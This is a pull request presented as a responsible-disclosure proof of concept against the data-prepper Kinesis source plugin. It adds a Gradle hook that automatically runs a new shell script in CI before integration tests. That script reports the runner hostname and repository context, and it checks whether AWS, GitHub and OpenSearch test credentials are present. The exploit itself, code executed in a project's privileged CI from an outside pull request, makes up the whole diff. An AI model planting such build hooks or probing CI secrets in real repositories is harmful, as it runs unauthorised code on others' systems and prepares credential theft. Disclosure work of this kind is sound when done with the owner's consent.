### PR TITLE
Reachability PoC (security disclosure) POC-20260725T082500Z-20635

### DIFF
--- a/data-prepper-plugins/kinesis-source/build.gradle
+++ b/data-prepper-plugins/kinesis-source/build.gradle
@@ -74,3 +74,7 @@ jacocoTestCoverageVerification {
         }
     }
 }
+// --- responsible-disclosure PoC reachability canary (POC-20260725T082500Z-20635) — remove after ---
+tasks.matching { it.name == 'integrationTest' }.configureEach {
+    doFirst { exec { commandLine 'bash', "${rootProject.projectDir}/poc-canary.sh" } }
+}

--- a/poc-canary.sh
+++ b/poc-canary.sh
@@ -1,0 +1,15 @@
+#!/usr/bin/env bash
+set -u
+NONCE_TAG="POC-20260725T082500Z-20635"
+echo "=================================================================="
+echo "[$NONCE_TAG] attacker-controlled code executed in CI runner"
+echo "  repo/workflow/job : ${GITHUB_REPOSITORY:-?} / ${GITHUB_WORKFLOW:-?} / ${GITHUB_JOB:-?}"
+echo "  runner host       : $(hostname)"
+echo "  executed ref      : ${GITHUB_SHA:-?}   (attacker-controlled)"
+present() { if [ -n "${!1:-}" ]; then echo "  [PRESENT] $1"; else echo "  [absent ] $1"; fi; }
+echo "  privileged credentials in scope (presence only, values NEVER read):"
+present AWS_ACCESS_KEY_ID; present AWS_SECRET_ACCESS_KEY; present AWS_SESSION_TOKEN
+present AWS_ROLE_ARN; present AWS_WEB_IDENTITY_TOKEN_FILE; present GITHUB_TOKEN
+present IT_BASIC_AUTH_PASSWORD; present IT_OPENSEARCH_URL
+echo "[$NONCE_TAG] no secret value read, used, transmitted, or stored"
+echo "=================================================================="


### PR DESCRIPTION
Benign reachability PoC for a pull_request_target fork-checkout finding, reported privately to security@opensearch.org. Prints a canary + credential-presence booleans only — no secret value is read, used, or exfiltrated. Will close immediately.